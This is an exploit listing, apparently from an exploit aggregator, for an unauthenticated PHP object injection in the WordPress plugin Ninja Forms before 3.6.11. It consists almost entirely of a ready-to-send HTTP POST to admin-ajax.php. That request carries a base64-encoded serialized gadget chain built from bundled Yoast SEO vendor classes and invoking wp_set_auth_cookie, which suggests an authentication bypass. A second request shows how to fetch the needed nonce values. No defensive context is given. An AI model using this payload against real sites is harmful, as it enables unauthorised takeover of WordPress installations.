Exploit for Ninja Forms < 3.6.11 - Unauthenticated PHP Object Injection

Name: Exploit for Ninja Forms < 3.6.11 - Unauthenticated PHP Object Injection
Rating: 5 (258 reviews)
2022-06-15 | CVSS -0.1
## https://sploitus.com/exploit?id=WPEX-ID:8843D66B-E895-4336-AFDA-00B99442CDC1
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: http://example.comted.com/?NF_Admin_Processes_ImportForm::startup=42
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1976

action=nf_ajax_submit&security=XXXX&nonce_ts=YYYY&formData={"id":"1","fields":{"1":{"id":"1","value":"{querystring:NF_Admin_Processes_ImportForm::startup}"},"3":{"id":"1","value":"42"}},"settings":{"actions":{"1":{"42":"42"}}},"actions":{"1":{"42":"42"}},"extra":{}}&extraData[content]=a;base64,Tzo0NDoiWW9hc3RTRU9fVmVuZG9yXEd1enpsZUh0dHBcUHNyN1xBcHBlbmRTdHJlYW0iOjQ6e3M6NTM6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBzdHJlYW1zIjtPOjgyOiJZb2FzdFNFT19WZW5kb3JcU3ltZm9ueVxDb21wb25lbnRcRGVwZW5kZW5jeUluamVjdGlvblxBcmd1bWVudFxSZXdpbmRhYmxlR2VuZXJhdG9yIjoyOntzOjkzOiIAWW9hc3RTRU9fVmVuZG9yXFN5bWZvbnlcQ29tcG9uZW50XERlcGVuZGVuY3lJbmplY3Rpb25cQXJndW1lbnRcUmV3aW5kYWJsZUdlbmVyYXRvcgBnZW5lcmF0b3IiO2E6Mjp7aTowO086NDY6IllvYXN0U0VPX1ZlbmRvclxHdXp6bGVIdHRwXFByb21pc2VcRWFjaFByb21pc2UiOjc6e3M6NTU6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAHBlbmRpbmciO2E6MTp7aToxO3M6NDoidmZydCI7fXM6NTY6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAGl0ZXJhYmxlIjtDOjEzOiJBcnJheUl0ZXJhdG9yIjozNjp7eDppOjA7YToxOntpOjE7czo0OiJ2ZnJ0Ijt9O206YTowOnt9fXM6NTk6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAGNvbmN1cnJlbmN5IjtzOjE4OiJ3cF9zZXRfYXV0aF9jb29raWUiO3M6NTk6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAG9uRnVsZmlsbGVkIjtOO3M6NTg6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAG9uUmVqZWN0ZWQiO047czo1NzoiAFlvYXN0U0VPX1ZlbmRvclxHdXp6bGVIdHRwXFByb21pc2VcRWFjaFByb21pc2UAYWdncmVnYXRlIjtOO3M6NTM6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAG11dGV4IjtOO31pOjE7czo3OiJwcm9taXNlIjt9czo4OToiAFlvYXN0U0VPX1ZlbmRvclxTeW1mb255XENvbXBvbmVudFxEZXBlbmRlbmN5SW5qZWN0aW9uXEFyZ3VtZW50XFJld2luZGFibGVHZW5lcmF0b3IAY291bnQiO047fXM6NTQ6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBzZWVrYWJsZSI7YjoxO3M6NTM6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBjdXJyZW50IjtpOjA7czo0OToiAFlvYXN0U0VPX1ZlbmRvclxHdXp6bGVIdHRwXFBzcjdcQXBwZW5kU3RyZWFtAHBvcyI7aTowO30=


The security and nonce_ts parameter can be retrieved via the below request

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

action=nf_ajax_submit